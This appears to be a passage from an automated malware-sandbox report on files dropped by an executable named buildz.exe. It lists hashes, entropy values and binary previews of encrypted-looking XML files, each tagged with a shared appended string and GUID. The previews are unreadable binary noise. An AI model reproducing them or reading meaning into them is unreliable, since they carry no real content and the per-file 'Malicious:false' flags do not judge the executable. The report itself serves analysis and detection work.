                        Preview:<?xmlI...WY..0)..>na5.Q#...*.GLR.-Y6...k.:...u..M.m...f.<..z..P....R3.[.9_3...*.t..m...s.....d....`..[qN.y..T.s._)./I<z.=^..@.;%....R.>..7.}..."......tL9....S2.K.=......x}S...U...8..K.3...ak?...l.j-_$.s0O..U..A.l._tB..o"g$.....d*....S....%.3.u.O6..o.>.1p.'.8).bT.......U..w..........h...f.yd.....4Y0.A..3...^........H((..t..6.im...4...K}....\..3..t.Yv....5-.(..;4OT...,.!.1...Y..d`O[..LO.p.........2.....k....^.C.).K~....L.(}...,..........j;=.;H..... ....N..9\6.l8`!f...........i#!v.H{.A.U<u....X......f.E[=vy.n...."..... .N.Q.2...dFJ...<...=.[....2.1.em..'...%...UG"D..".....-..%..gU......5.Y.|-..e.X[.........F....o...1@jA..~:r."...W..P.i.2%V._07.S..T.N..2\@.4_....S...#...z.V."C?.*.n...*.........=....P.......@f}.....f...n...~...<.B'..7-....:...(..'.~../..G....QYd.w._.Lhvt-.T..j.m.I....i.m.{.t.@...?.H.........u...\.m....K.... .p..YS.*^.h..s;u.o.%.,..=...bD>..n.......R..Xn..1=G..Cl.>E...(...y....}..I4L..P..?.;.uu...6.Q..U.1...R...O.pZe..U....{
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):856
                        Entropy (8bit):7.746067168916187
                        Encrypted:false
                        SSDEEP:24:vO/6BHh9sjx1mQVxE8g63V+tFbAldZVcA60GbD:m/8sjCQrExu+t23TUD
                        MD5:9313A99BFFC4D3534E83A6659B6AB824
                        SHA1:874788B7C94184393F0B835532E82A38CA4199F6
                        SHA-256:4C50A0F51E0248786A6973FECACA289CBBA513A255D185D5819E4BE5905AF49B
                        SHA-512:34728ACC8F424482456B164F87B12598ACE6B092C517FC39542DEFD0BFC77D74C3BDBC08532F43EB11AF8DD69F0D85972DC59BDD842117EA0D151F91BA65630B
                        Malicious:false
                        Preview:<?xml.....,...v..o...F.JQ :..w<...z....%.\....>9..V3b({.V..21.q$..ShIM.A..<.2.q.e)_.#....4.V..x/.s....a.5VTE6nY.&.6.j.L......|.J....p..y..!.k........$0.rt*[.........6.r..).W.r..C7.]]B...H!.t.....|O:yR..s...XN....-*nI....$.....3:F.3B0V.....\.9./.....#>.W..Z..e....txg.D.DcUG..T.....S..\..x.3..T..s..|.*%:...#.+..W..bh.A..<....9.c..S.0..K.6e..@.(.=.94.-4$........N%....S&@..$.5........s3..xM.............`..nD,.6...D!fM.d........x.U....s...b#.H.!r.f..xa...vU"0..P>...).zO...t....Al......... .a6..O......ku..m..t..7Q.F>....M.,&.N....8.h.*?..w.x.#...&...9T.5.Jw.P!?..=...i.6`:.}+......E...._.u./h./..b...U#e|...........k.X........i..k.5..~.>]54t.F...X..fN..R2..J._.:..h.T..q...}..4.E. ...C....]._.i..FQ......x....V....).....HA.r._. Q..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1084
                        Entropy (8bit):7.7951790514283825
                        Encrypted:false
                        SSDEEP:24:hvLWeVPMRC1+/X8fuiMwNRPRb0XlPhdxUVr9P4w1p5tXtPVnq0iKlcGbD:9WX0QobLRPIUP/75VttWUD
                        MD5:80F20132DA0331EE50BF166D6F6DDC22
                        SHA1:5FBF46F5F9E642877FC206ABF5198BE6F9670752
                        SHA-256:C358CA450C5872B546F5D9238CD454DF4774E689E77338AC666ABECCB3FBB2F7
                        SHA-512:EDC66CCFAE81226D1B26983169DEFC34E916CF255250137AD59A059FDCE72227EEA98DEF8F6BE31372B08236160FEE247C773A300CDD062C79C1538E562107D6
                        Malicious:false
                        Preview:<?xmlC.p.{.'...'....a5G..7.\%F2G...a.._....cFG...6U:-.Q. ........"/QF.g...{.PK.Hw......\....s.5......7Q7q....gG...m..G~<.JW4g...u...c.3.........<.0....3Nd..z...3l....... .6....$.....K..lQ.6&.).@..z.(s..........O...._..#J..pm.....&..}..}.:.4..&.[)...=.HB..Y..~...Z...m...F. N5.Qm.-.2.........c)..P.q.t.E.tc..o.M...%U.U:_..O....<....m............lE%}t.q.F7v..l.."h.^`.f..W..e..B.J.;jH............qI.s....;zAA...G.o".....I...t.{N..x7......=..DMH~'.q....-@,..7..A..X..W.$.Ll..r..5b....h.....$..~5gy.{^ .[q.(b.......0....{3.7..Z..j..vN..uH(zc..NF..9.>.k@.K.,.4-....u..n.".F;.X...!..^....^._R8) .h?J.-.....I2:..W..wohC.N9..o... F.......{fS..!...C....`b..jV...!...f ....2yD...w...[..S/Y.t...[)Z...F.....l......F~.....:L.B..R....w.a?.g./.s.g[.R..T...G..m.>5.<.@U'tT....A?..:..7.../.....`P..9....5..^...>.u.....B3L.zD.|...d~.....~...".......B....u,..&.;..hlE.,..J...RX...0P"..e.`..........3...'L..p_....D..^.0A\..p.c....+...A.p.W....i~..$...<E.D..PF,.....xd...+
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):924
                        Entropy (8bit):7.781257572754932
                        Encrypted:false
                        SSDEEP:24:OWPv1p3ZZa1Aa2XyjXthrgovuX9LW7sPYGbD:lPf+0GH7u07mYUD
                        MD5:1BEFE73CAAAA613FA345C713A431BF92
                        SHA1:FD0A9B4FCC79AE377746AB879FCD358BCA1F7D28
                        SHA-256:F21D80E362402EF63B99FE4CBA21243D6D6EF11F316ECA5E06AD73CB50670076
                        SHA-512:C7536DA7245CEA6562E36E65C9E63A6E2F1B2625E3F01208D525B4CB32128932AF8C8C79DF285EB4664B970C490B67B6CEB041F6AC36D92721DADE40F4D9364F
                        Malicious:false
                        Preview:<?xml..a1V..zU.0p..|bT{.....9.#Mp....)..[*.V.K.NE,3.d.Y.Uj5TZ.;...W:.<..j. !.Y."......{.?.:.s|.p.....%....>..@...L..W.....Z......'.....pbn......(......O.+..~.......y.r..K..~.o.m...z.(.M.N.[h....l~...^3...~....H.&....../n<B..Ki....(..1c..Us..;U%.......[..A.)....x...vI.w..$8x...(.......G.....Q+/..O..-:..9h.K...0..p.j^.q+.A..6...I.e.q.#..*z.D...n..Yv...2.v}.y4...t..*.GS..Xu...Q.&.....o.. .8...~.....}K... n&...~.>...l.xmTTZ..p.......B...t.s......R;u8!.:.Z..I .......... X\.up{.PQRW*|).Bq..$....LT.c.R&.w.....9....d|.'..~.k..c.."...T .r...FC.......z2G...Y5b:1_$&....0...m-7.._=Cy/.j.(VW.W.......'C...i]]gv.?....gd..'.~Rb@....J;.......=..^7...J.....qN>m:SCM....f...,W.VE5.......2..1.P6t.yag...8?.I.?..........S2......z..i..,..6.:-.k..d8~a...v...,...5y.m.o/....!...J...$X...s..V....$>.Oo...V^...y./....../.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1090
                        Entropy (8bit):7.83783291341971
                        Encrypted:false
                        SSDEEP:24:P/AtvuakubD3ih6/jM+7BsZyvYGYvr0HkGzA1+zedcaGbD:HAtvL7ih6/Q+NsjGYvAfXfaUD
                        MD5:3FF8799316370EF763778367A9B81651
                        SHA1:33AF10377BF19E3FAC38D3A9D24FEF40908D5BC0
                        SHA-256:6F44B148DA892227894208A52328E4956EC2720676FD791561D1F6C937B8CE3B
                        SHA-512:A45C72A906781A96D5F870AEC3F9D249396DD77DA6CCC8156558BAAE710CB4A0E07303A113AB49277D40923AF6506963E7A1D606E18F9BBE7F87A4E21C321793
                        Malicious:false
                        Preview:<?xml.)D..h.u...h.%.P..........7......^)"\..\.I...l`U,.T....^.W?r6..T..'.W.Gs.P.XgO.!.:..J..A.:J.9..> N......)..+...........6.8."..$@=...I..xs......_.K....+a@....z...2...P.A."?T.5X....(S.?N.1.54k..U..-3\...j..t.....gp..~c.....\.(>...;..~2.".: .l....:...U2.........D. t....Co{...p.M.x.x.^j.60....py....../.C.1..................O.e......M.BK.E.i....T&w.1~ ..x...v..._._..*.y...G.HZ.%K..r.V.....Q...t..?.Q....9..=..O<....w<w. N8/+.W.....)..C.]}.I......NV../..d...^C..fM,6.g.,..].McW..;...$}.\..................I.W.-.z]...x..1.b.Xy.x.......N.H.....X...y..U'...u..)...p"<h..k.8^...Y.ts.z......31w...p-4iIU.j>.Z...'....E.....@1..5...J....j...YK]...f}.,.+e.....rz...`......r..X3.+...mB..v.S..n.....R:.....S..u1..oy..)A..S./..]49Zv.$=a..1........<"..K..HfO{....o.....4......>$.NS.h>l...l...R....@.)!...~..>l6..H~...*.*..c .M"M.q.7.W.A.._v-#.2....M....)....Mw`..X]Z.@.........t.D.......#H..-..|b@.c...P.`.....6a..d...7...C*.R4.j......}M.L....O...nt....2....J=c.v[k...y..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1090
                        Entropy (8bit):7.811179545794036
                        Encrypted:false
                        SSDEEP:24:O3O93n4kdY9LhWLaZp1VqwCw+FyvUM26GbD:Oo34WYDSa31VtGyvUMfUD
                        MD5:81AFFCAC15189AE700F7F902FB8B1477
                        SHA1:E86F1A3112C05A881EA3E7969DC332E2942C1B35
                        SHA-256:77F71702C5CD6D257F39C284F547D942D23C8BFAFA3D751EA6CB0BA1425723D2
                        SHA-512:4BD6C74CD73D88E680DC45F84DDADD5C9F013EE38140C7DE27562F319BAEBD9D98D16BFEC2D69E7C72AD5584DEA76E5BDEBE1F2454ED87DB3E4D25734DA5E984
                        Malicious:false
                        Preview:<?xmlS.y.l......;.&..|.......&...c.({.]R9..7.&.%...Wxd..d^..a@.)...... T.*.p...g.+".?_V.Xu....$..C..^?.........$..%.n.#..4.s.N..~L.?..w..7.z...rpp.3.q(....w..._..!4...`..c. .~.............o7.:........r......i.9b=.;..>U...\o+..M.%... ..!S.V...M?........]..I...O.Fy9..u..7.....z..[:V.....1.u*..l.@n^..,..S...Q.Z*..Gnj..8^.B.Z..R...x4...z,&Z.R.A.!.l...b0_..Q.d..C...e...,f.s.....G..i....#I....3..wJ...".mD5..d.g..{.i.N.X.s(.gAN00m...XZ.s:.*..T....wK..S/..Y3onE8..Z'....)M..>.-....EN.....L........R.SWv.!..n.S.W...".....cz...;uC.H..CM..r..<.{.......a.3 K....c...`......,0..4....,v...Q.d@j..R....\.y..w..m~]J<1l.....YH..e..[P\.C...p(.\..H..v....,....@.N.......{V6Z..z .r..c.9........]h<.}QF.!.u4]-...t.&.Q..*UF4.Z<.....APi.Ur.<...2.C6...q..m.4U. ..'t7.)...7x9./#g.BTX.G.t.7B..@..6/.J.Z...Z..*........j....,X..T.....g.#....F.Q.B.V.K.@..#...%.M-.s....!b@.......|15LB..........`..VV.6..5?g.zs.....+....}.8s.:....E.....5...3..5.A..f.p..K.....h.G.2y..?6.....V
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1108
                        Entropy (8bit):7.830320553475191
                        Encrypted:false
                        SSDEEP:24:smsKgefYgHK6YM4SiO9/llVk3nJ1creQYlZd8XsJGbD:smlgefHKP0i+lKA+ZLUD
                        MD5:67985B6A7671407C8AE21A4BC5F2F405
                        SHA1:7FE94F741AE806A170A9692322DE3F724C13F42D
                        SHA-256:AB8BBD414725E8B3FE1C14238FCEC4584A85F1F7AA1208CB94EE22B17839EC61
                        SHA-512:B15363F24C67A8195E94C738746095F5C41A425978A123D3BC84705CCC0D40BCDE1A62DCD0564E594B74D7D94991981A9492CF53BB24EAB0BE4BE55F5C333AD5
                        Malicious:false
                        Preview:<?xmlkgm+{fZ.....!...U.1..._..6.n..S....;u..h._c+YS.f...S.AA.2.ii..+..UH6{e.....25>.2........+.T..R..X.l;rt..k......"=.......Mb..%..U3z.P..$.....E..~E..)..N[s.....].J...t......aQ...A6d.v..z..N..d.....phLX.).)....x......;4.l.|[..I.G7.....C......dU.'....h..A.....(x..we3.....|..:..0...g.y.C..H...F.....C.........l.8Tc......S...sJG.....<.Z..l.F.M.R..\.....n.".~).X_..1.k...R.I..!.<p..k&LT..G.0...`......;.......[.M.u.8.d/.]9.n2..7.L>.y...u.V(}\.H.O.0...8.>....Hd0...w_.4iJ.7e..........1..3P........j..R~..r_............^....gF-..@u....}J..e.[..#..T.N.Z...u....vQ..|..z.M...sM\.Fh......'..?.K.}R...-.V.!.T......j....T;.:.A.@....e.2.".N..!......sp.D...DL`]x.\....)..5.9..f.qA.f...._.y....b....s.6>$c....L.S..HX.@....*.=#.py\^I"Y<..Me}.G.G......l.fx....1i.v.%....t1J.....{O...= 7...T...+U...::..*.i.D.3.Q..[.y.......~-wQf..$.x..-...X....%.....m'c..rp.U.o.]T.x....%....E.H7~...g...(4...s...E.n......../..$.H...vu.Cy&.~w.....UXE@..f..z...J....z..Z.p\.H`"..yV...w.l3...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):934
                        Entropy (8bit):7.774778018301742
                        Encrypted:false
                        SSDEEP:24:RQH1UVN7ExmtvGRD58jWjfilgmOtUy4aMVGbD:RQVUfIbRD58jjGLH4JUD
                        MD5:1C95A16770F6F84AF9FF9CC84523D71F
                        SHA1:8A25F3AF3452D2BDF25157C59015556A838F0444
                        SHA-256:0CE37DC0EEFE4A4A583027B5A6234831E1B391F648B8B33F663D822A7685A7AF
                        SHA-512:1B6C6A37197FF0E89F9C908067BB09D91FDBC8261E0A19718BE7FC1AEC6A277FC47A102E40D5F37E25F3A7D225922A466F5546E243816B4180137CAF568523EF
                        Malicious:false
                        Preview:<?xmlrW.\.......pp.....`..a.D'.%....B.....c#J...E1'....G.....h....."../GC.\3..4.."..9.\Y..-.<.9;.iZ...z.!<..j).A..%..Df..|..d?._...Eo.....E.kj!...u.P..P.J7.*.vzu..E&$0h..{4as>_....t..jes2.^p...R..3..e.J......hn..(C.tu......~%............b+$=q<yO.....Vj..tuF....T...P.F..U.h...S.^.....H.2...-S...L....._..{............/.Dm9j.._nb....J.]..&{.......r.......0)Pw..`...^R.pL...2.*.."...`..I'/5.?......kMi......N.tEt.F..~<..V.?5..^.../.U.9.......yPXWC..wh.....(......;.\.L3.,9........xR...j9|a...gVT...._F.........r.....~..D3.k..z.....k.6.......HP...zm.X...%1...Zm^=..|...=..g...>2..a.p..@..N+...K...y1}M.....1..)].z.a...9q...d...F).eG......x.|........<4^E....${.r 7..5.O.q/..w5..n.L..v..../.........;...^.KkE.!........r.....[EABP..w5+.....g...#|....i......+......../hI...w.......=..Ec^.U..z...)._..rt..j.....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1126
                        Entropy (8bit):7.7913181855047595
                        Encrypted:false
                        SSDEEP:24:G1jduU4vQaj5RUk2CHlvfD+yMyKkcgOlLF13YuQ/zxGbPp5pwGC4GbD:Gtd74vVj5r1b+yMyGlLF6/Qbh5pwoUD
                        MD5:B3B94D96858DDDEEDB695149EBD0C0D3
                        SHA1:8D3CA1B1FFC75BE217B17869F32CAA23A03279F0
                        SHA-256:389F0615C5C39730ADC9BD26BA6E00C5F5CC008CA7C3B32F2631BFAD39201C72
                        SHA-512:42A5A8A1A1ADFD2D1D461B9304144583F9791820FB203C1679768D548D11D58996EFF2D2678800B435190F54CD37A494E7E6E4FC8D567DB52EE238A4D8ECFD83
                        Malicious:false
                        Preview:<?xml.Q.._@..W2......PFTqzt..*[&......I.|.q.H.3.......(....*.........j.z(,...|.1Ly..gB..?@2?.C..<.........\. I.b.xt........}.....{..At..4Y.e"._3M..CRkb".Hn....RV.uN>..b..D...w..}.f..wa..*.+.3.-6B)0....W...9.]9w!.t.G."?.ND.jz.B.wT\./].#....U4.5U..........=......Ix.n...(..&p...$~a....jZS..l..<.....i.X.6.../=;..Svl.....{./..L....y.......a...k..#b.......5?....p.Y.K.......R.r...).a...F...IW..*M..1P..8...XY. .....1.P..%/.....G.W.rH.....f.....~).8h"P.cQvn..mQ...........TI)Ly....Lc.....5Y?y..}..t.0..&..G..`.U..v...8..........3.......'?\..JNJ.s>......`.d.W........E..v._l...M...n.!..-7..__.;.Nw..8.k......E~=In..9.-...=..U}%".Q.r.M..(m.K.0;...y.v..jH.......d?..i..X.gQ.G.@. ...L....3.@.:S.=.2..R.........e..RF.-z..|........O)^mR..kf..G/h...=!...L....G/.Dh..Ls..y#.!....?.yH.0!.@.UK..jb$tQ..d.5...I`h..C..lU..T._...&..H.#ZE.....Q.E...d&........}wGK..H.%.........4].,....(.v!..=3...G.n......M...;C.L..t......o.^p..#.u...*.p...;...kM....e-+B{+wQclk...<$.......:.........$
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1243
                        Entropy (8bit):7.828812227961734
                        Encrypted:false
                        SSDEEP:24:6SNVBO48ziWyB9ogDtjeab375xP1J0s4lI1FXbl45QZY0n3I+J5LZp6/m7OFqgUA:6Sp469DtiqTNJ0s4u/XR1ZY03HLCnFqQ
                        MD5:10B8A0446C074B186A8E3A3DCDD716BC
                        SHA1:78B416EA299801BE5041AFD8EADB1B4765979AFD
                        SHA-256:D102BDA9AD576616B7A17B52CEC3D69A32992D3302246F44A183B724FB97627D
                        SHA-512:FB928118252C3DEEB4541AB474084E1E242ABA8FA621E4036FB741AAB1A227F41B468C4B96E114DD4C2096A861300D9AFB8F8F12D82AA6CA2DEC74B0DE693104
                        Malicious:false
                        Preview:<?xml.Y%.w.5bl..5^A_.v8.x.r"..C...^..L.B....X......8..Jz].cRp...p...r-.lT.}..s.N..i.Eo..4.......2.i..'..$...GQ..-.8.............`.M...U..P.&.e.!.L.K..L.4Q.?....f]Dn.T._.......Vu^..ds'k.......V......}.e.P&D`.W".~.&.]...:.......)\..1s.KJ.E,..5...~.r.2D.1D..l(..6k.-....!.?{.FB4...Q...co....c.i..%q...y..^.5".!.n.g...=.j..B....lG"......9L.x".aD.U.....D.....W.V.+._.:f.....r.6..:.=....`s..+.F.K.n.....h......0....b.E.).5:F......b.+..........x.Z....Oo2....*o..a..w.p...{X........J..9.>..%0....B=..L...y..~....l..9.t}.-.....X.e-.O..md.Zb...cl..6l...`9,.8...H..$.4.+.Gs-...c....LW6P89..."...x....Ue.Afu@.-....C.......k...{.Mb....U80..A...-..e.*..9G.,YQ....3^..se#N.....<w..f7....../*.,......+Y;....')...9..J..D.m....j^..Y....%o.]!X.\1y..E<;....H..^.y......Dx.ZLe...5...JU(3+.V.3....1. .,C......D.....2(.#...y..8L....zvP......N.H9.z.Eg...|...vj...fL........0... m...@VC.ACC...pF...OV..I._.[..X+......:..u..........-.;.}.,..i.a9.."0.mM..D......Nr....K..Sc.z
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):871
                        Entropy (8bit):7.738826592473922
                        Encrypted:false
                        SSDEEP:24:Jg/phote3FKmVihMCRVMqntN3YkV+UFITEfGbD:MpGte3FK8PCROytYk0UoYUD
                        MD5:B6D4B23601F9430266C3088D81C2F119
                        SHA1:40AE7F80A9A52C927C0955BBE5D99F9C798254A3
                        SHA-256:EDD78C5A4A83B99B68347A8F613B0EE5944E69AFA8F1B8AAE202EF9850451D87
                        SHA-512:6BFE2F5F2BF177274F653C9AE29A991417980E1F738EBC4D91D1B5C7E0D5A5C70581394C2C14DD9A2CC98C3CA0C3FD557EAD5AB1E9AC87DFDAE8EEDCAFC19839
                        Malicious:false
                        Preview:<?xml.......i.8<..d..\....*(6,..h.+....n\..b<.2...>.D....5.V...F../..........O..&.....\.tr.{...>..wt........&..Z\.?K@.}e-....)n.._<.W.r..Y.....R}Z.3Q.g..w..=.....0..H.d....Hn8w..*...tB"C.l...f_+..'...A...$.If..l..(_L.........j.8,.C..s..z...nq....:vP%-Am.....q...mV..f............#..k.WTT..{.D..RO.4.WhQ...........*..y..I..J..2......._!#.....@+;..pn....!.O..Y.^......3V.......C.Z.D"..0.]-..^.s...s..({...|B.Z..ss\....|.{.|......V...|....D:4.S..d.%.".Y,.....~Twd/.^..O".Y...p........3#6..}.y=f...[...U..Q...?.(.7.R...#.&..`.r._7.....xLR..H.!........<.K......M.x......y..".........V..'L+U@).M4(m.......b.Gj...s...T2a.-o;m..X}..y......icnF.,.q..|\.....=..}...oj-..h......;.!....M.YJ..m.)w.'9.~y.Ew.2#.... ....I...O!..X.L..EW9....h3.&..B[..hO.0...Y.3.rKQ.Fw..."EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):866
                        Entropy (8bit):7.730093324977979
                        Encrypted:false
                        SSDEEP:24:eScegJBHHfcwq9iqbaNCmt3ogQX+AhyoDPqCrmQDodGbD:jcemBHH0VsioTkOAhD/PodUD
                        MD5:BC27CD3D09B35E612A408101767B5973
                        SHA1:7C01CD3ED513B3DF258F6FCA4260C20C00DF38F1
                        SHA-256:A22E9B353FA728F60D8EC9123086CC15F99425F49A2F8341A70A5BB1FA3C25C0
                        SHA-512:F38E87ABC55415560E5EE59C8CF209AD2043C54F09B48A652C5B2A79D14AAFF15B6D19CE8B7AC929E8B716445013B3D9929EFD58FDA87094B4FF25527EC1656B
                        Malicious:false
                        Preview:<?xml...M...)..uRn.`...|..}...s....IHD1J.+..D.5a.L......B.3..Y....Q;:LB........:..-J.>....J.wC..ax."...g...$k#v+",6.K....... ..JW.....y!.>H......";6...%..SS......u-.Qh...f...rf......Q.z.....Tx7kI9.K......<..q.:........T].p.@.%c\-0.-q......z> ..h..w.7k..T.N.Q..!#Q.b..N@......zm....^.f..S......9.........B..u.HX.........\."....Nxo\.MI..3..........2.{...$..>..........lUOY...d...<...&4.i.e....v...#R.......'.....h.a.M._jk.j...Am...xq...{...4.!@.M....K. ...MN..8...+......gZ.......3.V..|....$..I.jj.(.kKRBb..a.....[......I.>...m...m...E..S~^..m...y......!.6&E.y..I.!.....|nm].H....C.{....t.-`.H...1..Nt u...../.`......l>{...Yc..`.^.L..I........*..8%..;"k-_...}..v.<.q.....h..P.:Hpz.^...8...2p..#..n.P..Wf.q.m.......p.>....+.s.PX..~.J.1.....dwlEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):860
                        Entropy (8bit):7.713135018310271
                        Encrypted:false
                        SSDEEP:24:dqh1kZtKQPSzcYVBGc8UeG7Aw0+g92EGOIGbD:dqAPK6KGBGU+XEGOIUD
                        MD5:637AF414284781231516D7B3BC29CD45
                        SHA1:1A03F863118BFB3C768BE70C9B48FBE733B771B7
                        SHA-256:3E1055979667E301127E6C8F385A21462781506277B2066DF6301F18D83B1585
                        SHA-512:6099F8DB8A4CA6D344F26789C73A7B9E7A3DA3C376355E867A67B27007BE53074526A563C889E4E7F101185691E94B8B0E56E08EFB7AAA436462FFF1A792F497
                        Malicious:false
                        Preview:<?xmlQ..v..~..g....23.....\........Uk./8.g......bM.PY.....1..`.....Y..#..B...g4....]..lzZ....%.....A.0.......RO`}^A..>.E-...$..07...:U{...W.9cX....D.$9SU.V&}....;.s.T2......+..z..R ..Ui..r.E.......i.r..:..&...H..m...rK....8..Gp....t...5...Rzt.....I...Z..s~+.%.gu|yI_^............l...{P.?.dK...Y...+.:.3...<|V...#.O..G.o..!.........f-e....~.....6.+..]3...,...........Q.Yq7{9}..0....MH..K.........v.........A....87N.....z.Z.B%.....f.........[G..l...f.#..d..}6.....)....=K....d...1.Q.....0...}S!....6m.67..#.:.S...n+..0w.....WKD.<.7....uE.........!.@B.Q.+........V-.i...B.G.-...........E....'....J.C.r.6....v.....?R...3.o..N2w...`;%M.4...s...._F?.s....g,.........$..GlR.]..R.....3....Z..;......!|..f...9.X..?"ph....U...z:O7.q..V'5&{.p........YEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1057
                        Entropy (8bit):7.814142148547884
                        Encrypted:false
                        SSDEEP:24:WmBuhZ/kBwHml7FzzLEoW0XzhKh6mNI9l7EjKGbD:WJQmW7F7hXzhaSPUD
                        MD5:5E4AC468E37249517892D77FFB0B11CE
                        SHA1:7B50D5AA4504DEFAB059FAE1E04D80A381A41FFC
                        SHA-256:D65A03FB6A5C7A6D64456025414A20C8E26F0813FF10328B7B27C5F104CCEFC1
                        SHA-512:F76AF1C1F3BF445AAF3BDE63789269FD42B752A169D68DCF0AC697444EBA3F133AAF0C405EB55E931472DCE3EC39B79409FC29BCD0EA83A872BFC70E0905A96A
                        Malicious:false
                        Preview:<?xml......Y..}.H.aK..-.........b.....5.`..........|......W[g.Jo.r..g...To.R.......?.U.}..fG...|Pdj.a..S.$.RO....V.Lj>h.*...J.g.G:....)|8.r.........=...b.:r.. .F....2.}&...J..L!...L6......xt.....%{.......v....[k..R\.E....3}._./..kK.Wa...........M..T.V....?.4t.T.8q'\../.o..+?........j..b'B...>..2..1....2z..;.....%..u......1.U]5*....U..........Y.F]..h.'Ur.R......5=..R,.Rn.tvg.(.=5.W.X;z.r.5.60.....S...q3I.C...gU....../.h..;.J3...kEgIT'#..N...v.4.V....x..)_ .s..'.#.!..n....#..z.i.\H.].,(Z......ku...f..'..a.W2N7...O.z.M...._....[..k,.G...2Y.P<jv.wt...F ..{....mOa..^.jD..]W..=.b...|....M4......\..0.>.U.....wbzF.......$..!8....z..eM.UAo..P.....I.5.^V....~C..8 .?.M..y.!.f}@...y.8........i..C......t|.m.V$..8...t...y.t.(.3...3....!..93r...w...Cr2.GC.4..1...{t...X.>.........9...h....\......5wr@.ezK-e..*3.u...M.u.gu.wq.f.1O|&.6 ."B..N.....-I".#!L.F.}..{S..........$[....S..f...h..F...7T...@............".+..m....Q_:.EdRvSqD59xL4qFRlN46qL
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):766
                        Entropy (8bit):7.700413861023513
                        Encrypted:false
                        SSDEEP:12:OBtbG4ZG4rttE0DFH8VmB9IR+MdH90j0Z06Tl1bEXGw68K6+wXchF/26Gcii9a:OBW4pO0DFd5MB900Z06TllB8fXcbGbD
                        MD5:8F652680E109CB3ADE74D3EAAF60C2DE
                        SHA1:976DA9EA59D02EFCD398EF5ECF6354EC41978165
                        SHA-256:EF83426965C605B7AF069411994BEB08A10832715F5085EAC6E87BBBAB92C787
                        SHA-512:FCA30592210EA865EE96B52CE28D4B19C1E6030EAC588D2366A3EABF33F2A78675634F4D7871DEAC892B34A277CD3E6553BEC84159C2FB7EE851380B01114FD9
                        Malicious:false
                        Preview:<?xmll...k..n.w....WeO..$...<....c.^..MU....T...M(...LI.0%.w..*.V.......>#.Y..,.]Pt~X....y..5<.g."...W...4g..Ls.e..v3.)1..L....(.9t....b.~...AY%..`....&.8...T.~@S}.^...2..N.B...a.]&.u...M.J.p..v...j.7.4.a...5.0.|...Q...K.Nt...o......r...&5D.......7.Dt........Gv.m.KI...tU.`...m.......q...3.P..H{~.F...b...eR...oUY....kx..n...........9.U(ME.M.....6..qW......g....rB`%.2H.-..Wt.d....!xh\..._.....*.&..A...z..vjnv.Q.F...>.J@ha...<.c.U.E.<0....BT....}.......)...\ c...d.x..3.8..9.....:.gIm......H.%oi...V...s..........h..-.!..$*..E.....=:....0,..e....E&;-:.g.>#.f$<'Tv.m3..[.q.1H..aB..."....V.Ne..:.YE.N...$....._>.iP...V.{:.`..I..<y.....!1..g.V.z,>.D:.DL(EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1037
                        Entropy (8bit):7.809802529492267
                        Encrypted:false
                        SSDEEP:24:SWG01IavtBeMzJj2/PZdWTdu8j70JxMQgLr7miaKOmj7cGbD:SWG0mAkkWPmTs8Wqz7gsj7cUD
                        MD5:0D0A45F046097DBFE071BCB99163F9EA
                        SHA1:65AFCF0ADE4565DC27F0CFF68FC18A71790EF8F1
                        SHA-256:F553DD168B3875DE741BFF9928D5B900CFDD55FA966A878D39A14BD740AC099E
                        SHA-512:09103F488CB2AC0DD284EAACDBCB241795DB8D8F8962D554037562C0C69DB942ABCCB202713A88D1CC3F72DEA414847A430F857ED5871FB39AC480DEF65D19BE
                        Malicious:false
